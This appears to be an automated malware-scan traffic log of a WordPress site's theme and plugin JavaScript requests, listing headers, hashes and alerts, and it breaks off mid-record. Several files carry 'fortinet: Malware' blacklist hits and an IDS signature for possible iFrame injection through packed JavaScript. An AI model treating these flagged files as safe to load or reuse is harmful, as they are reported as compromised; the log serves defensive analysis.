    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
                                            GET /wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.js HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:46 GMT
Etag: "686f-51fcfe51b0d80-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 11762
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   11762
Md5:    754355a06c13b892e3b696fc8fa731eb
Sha1:   53595e3de543cad4317fb3ee38d9bf87fca53042
Sha256: 8f718e22ca0f0f6f90135a8a18ad3cfa8a0c1c08b63e302e468ecc7930eece64

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:48 GMT
Etag: "32d2-51fcfe5399200-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6726
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6726
Md5:    b5dacc6be77582ec5eab717f3745bbd5
Sha1:   337f110ac383363cb7357343a2fb4ba7fe1a1e1b
Sha256: 0a21f84f6d10316670ccbe86971550dae63de040772c40c32452713a778a253f

Alerts:
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
                                            GET /wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:55 GMT
Etag: "2f7a-51fcfe5a461c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6322
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6322
Md5:    bcd8bbd6726f431a7e44acc83d337fe3
Sha1:   b8500a66b29f080570add7677eafdd098c06ad63
Sha256: 4810a15066203732004e4ee3d4691f4625cb0e0d3395d6e774fec8c7069dbed5

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:53 GMT
Etag: "322b-51fcfe585dd40-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6192
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6192
Md5:    9b0e9fc3a5f00c3ed996c404673273de
Sha1:   09ac92fa4453fe25a0640a02a1153c60e94909a5
Sha256: 3d301470e58a1e24d63b2b07af7cb8de77e43ddaec13c10a9daf0c5ab00c87f3

Alerts:
  Blacklists:
    - fortinet: Malware
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
                                            GET /wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:53 GMT
Etag: "7833-51fcfe585dd40-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 12973
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   12973
Md5:    23ddafd6f060f5a0c0e464d4cb3b7120
Sha1:   523913dd1298e15aa9322c4704c18c70df8ee105
Sha256: 7ba254ac6598e69bdbd27697232f05fb81a93ec981d3ae0d59e59bc47e76ad04

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.0.1 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:42 GMT
Etag: "4d40-51fcfe4de0480-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8200
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8200
Md5:    e93923516fe5f6111644129f881b4895
Sha1:   879e8b0e4ab2b3ef84d0fb2ec435fab8dd7705bf
Sha256: f13a0e2982ec4ec9fa99e1718b6767a5950db2a74c2570ca29de8caca9c11afc

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.js?ver=2.1 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:35 GMT
Etag: "66cc-51fcfe47334c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 10568
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   10568
Md5:    2c93d5fb733fffcafaeb4ead8d257726
Sha1:   1da9a7cb0ff161a14bbae628098ce27ff3d5729a
Sha256: 8ea6f13a05d88c8a25927717549b2146a72b4dae3dc86f91c88ebcdc215f31bb

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:52 GMT
Etag: "47b6-51fcfe5769b00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7799
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7799
Md5:    39105ccd7337880fa319944cf5c05fd6
Sha1:   e6ff713fb7e998ab2c7cc1eb8377869e4f56e86d
Sha256: 1b939b507a7683cc1a3ed7f601cd7698afbba4182b20ccbe2d9b92ee58b5e1cc

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:26 GMT
Etag: "2fed-51fcfe3e9e080-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6149
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6149
Md5:    d56df0858d8d7faa3404fe8139c9a4df
Sha1:   883ff6042c50c83ad1c87fb3c7085b7fa60354cf
Sha256: 139b9e3db9cf8ec64d7d050d5116d94ae413cabfb6010f29d1b7941a4aadb982
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:44 GMT
Etag: "60b6-51fcfe4fc8900-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 11198
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   11198
Md5:    c9de95dbbc97ce7160ba9a16c05bb6da
Sha1:   0d79f57092bd0ddbf4bead6d1e754594f3e427e3
Sha256: 9d7d734a13586e6333afe8fad8f8db888997f2a013ff00a8a465ab10b46a25ef
                                        
                                            GET /wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:55 GMT
Etag: "324f-51fcfe5a461c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6192
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6192
Md5:    852592f8df5029bb22e436c487d5e71a
Sha1:   f6f0404237ff6faa6eefcc9657a9d529ec454c06
Sha256: 4875abc149a886f65cfc25068683ecef7d1b3d578835076312b44c87087040a3

Alerts:
  Blacklists:
    - fortinet: Malware
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
                                            GET /wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:43 GMT
Etag: "4f2d-51fcfe4ed46c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7986
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7986
Md5:    f2ae15f736573a998532ff3aec4744da
Sha1:   6c70c97654709f37bf300d2c223d403c1c610aed
Sha256: 38c69d8cbbd7edb2cf2bde363189b45995d76bd94cb0acb22aa2e054c4d51a83

Alerts:
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
                                            GET /wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:39 GMT
Etag: "f96c-51fcfe4b03dc0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 18664
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   18664
Md5:    38e7cb151cc0fdd0c67c334a59c47732
Sha1:   8b300d1b82272297e074c845dc3c1fd1f735ea03
Sha256: c5ec22b271a0fbcea77a1fd5ec43cae70bd1aab0fc96ca87b4c5a4ca77f6a1a1
                                        
                                            GET /wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:51 GMT
Etag: "c14e-51fcfe56758c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 14120
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   14120
Md5:    a84bbac7f8acebf0a41a72ece855421b
Sha1:   a44534405fd33a6e89d05413bed607d960948b90
Sha256: 09b5a40e4c123ece4d61968fbc5c973acbea3dbdfc2b5b57af4b487a886b1c99

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/CherryFramework/js/jquery.debouncedresize.js?ver=1.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:26 GMT
Etag: "28c8-51fcfe3e9e080-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5646
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5646
Md5:    206abf914f54750ee9245c9d3c78fdc6
Sha1:   785dc395f21eec34bb069fa49c3a793651988d46
Sha256: 091c105a7858df0bf4c2497187791297865887f6844f7a919e3c0dd68a71c734

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/CherryFramework/js/jquery.ba-resize.min.js?ver=1.1 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:54 GMT
Etag: "2bc9-51fcfe5951f80-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6049
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6049
Md5:    c0ddb751d08133a85d78b54f2c68991a
Sha1:   1d3ac8fb3b5b1843d91a515601741001b968dfcc
Sha256: ceb1ef8c6d1c583aade971d448be3a6a1d4dc413dc1107ae4654cda6d4a56938

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/CherryFramework/js/jquery.isotope.js?ver=1.5.25 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:51 GMT
Etag: "6430-51fcfe56758c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 10364
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   10364
Md5:    cd7abf8023db97a714ad5e6e8a1b0ebd
Sha1:   67d60ceeb3ff20a6a717fb8ea3386137d58c5937
Sha256: fcad84d789f822a09092123193e742de063bde2e4840ff6c324bda2a39aa591b

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/cherry-plugin/lib/js/elasti-carousel/jquery.elastislide.js?ver=1.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:33 GMT
Etag: "3fda-51fcfe454b040-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7435
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7435
Md5:    4a179e3a48ad606c6fdcade02acfd894
Sha1:   e1a8662cb6b7459e30836bc16813075f0267ebea
Sha256: a035ecba75b237479f46e8a81c235fc5cc7d7d3158fcd045ce780dee28228e56

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:36 GMT
Etag: "2b9a-51fcfe4827700-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5829
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5829
Md5:    da8784c481c134add1cf19b202e0cac8
Sha1:   2d2a8b6bdd9dea5220ce8602eb4bdc34eece46bc
Sha256: 2078d83235c33f4d417d3a525e987e4ff843fbd9e544fe6eee6445e0b63365aa

Alerts:
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
                                            GET /wp-content/themes/CherryFramework/style.css HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/wp-content/themes/theme48340/main-style.css

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Sun, 28 Sep 2014 07:32:36 GMT
Etag: "209-5041b27728d00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 335
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   335
Md5:    0ab128c145dc02dc014a9dd3a3543553
Sha1:   2e0580f6e59871686833a1f0e25f428cab0a7500
Sha256: cab7f859ace57ab9bc60e1ccffb6d02027ab06a0eb15dda0ce47de52ccebb3e9
                                        
                                            GET /wp-content/themes/theme48340/images/icon1.png HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:42 GMT
Etag: "8e6-503fc5688c880"
Accept-Ranges: bytes
Content-Length: 2278
Cache-Control: max-age=5184000
Expires: Mon, 30 Jul 2018 16:17:54 GMT
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image, 34 x 76, 8-bit/color RGBA, non-interlaced
Size:   2278
Md5:    7b42b09e7925afe9ecfd14c9a9d47768
Sha1:   10b8dd3b73df84b20aee12846045bb46b32c38da
Sha256: 504f8be6e45e8c3ed6699c85747d77c6dfd45c5fe23c33ffc8bd13a3e5d0b584
                                        
                                            GET /wp-content/themes/theme48340/images/icon2.png HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
